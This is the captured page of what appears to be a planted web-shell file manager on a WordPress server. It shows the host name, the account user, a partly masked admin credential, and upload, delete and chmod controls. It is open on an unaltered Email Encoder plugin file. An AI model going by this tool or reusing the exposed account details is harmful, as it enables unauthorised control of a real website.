🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_292bfa1f / 82f5****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: email-encoder-bundle.php
<?php /** * Plugin Name: Email Encoder - Protect Email Addresses * Version: 2.2.1 * Plugin URI: https://wordpress.org/plugins/email-encoder-bundle/ * Description: Protect email addresses on your site and hide them from spambots. Easy to use & flexible. * Author: Jannis Thuemmig * Author URI: https://wpemailencoder.com/ * License: Dual licensed under the MIT and GPL licenses * Text Domain: email-encoder-bundle * * License: GPL2 * * You should have received a copy of the GNU General Public License * along with TMG User Filter. If not, see <http://www.gnu.org/licenses/>. */ // Exit if accessed directly. if ( !defined( 'ABSPATH' ) ) exit; // Plugin name. define( 'EEB_NAME', 'Email Encoder' ); // Plugin version. define( 'EEB_VERSION', '2.2.1' ); // Determines if the plugin is loaded define( 'EEB_SETUP', true ); // Plugin Root File. define( 'EEB_PLUGIN_FILE', __FILE__ ); // Plugin base. define( 'EEB_PLUGIN_BASE', plugin_basename( EEB_PLUGIN_FILE ) ); // Plugin Folder Path. define( 'EEB_PLUGIN_DIR', plugin_dir_path( EEB_PLUGIN_FILE ) ); // Plugin Folder URL. define( 'EEB_PLUGIN_URL', plugin_dir_url( EEB_PLUGIN_FILE ) ); // Plugin Root File. define( 'EEB_TEXTDOMAIN', 'email-encoder-bundle' ); /** * Load the main instance for our core functions */ require_once EEB_PLUGIN_DIR . 'core/class-email-encoder-bundle.php'; /** * The main function to load the only instance * of our master class. * * @return object|Email_Encoder */ function EEB() { return Email_Encoder::instance(); } EEB();
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar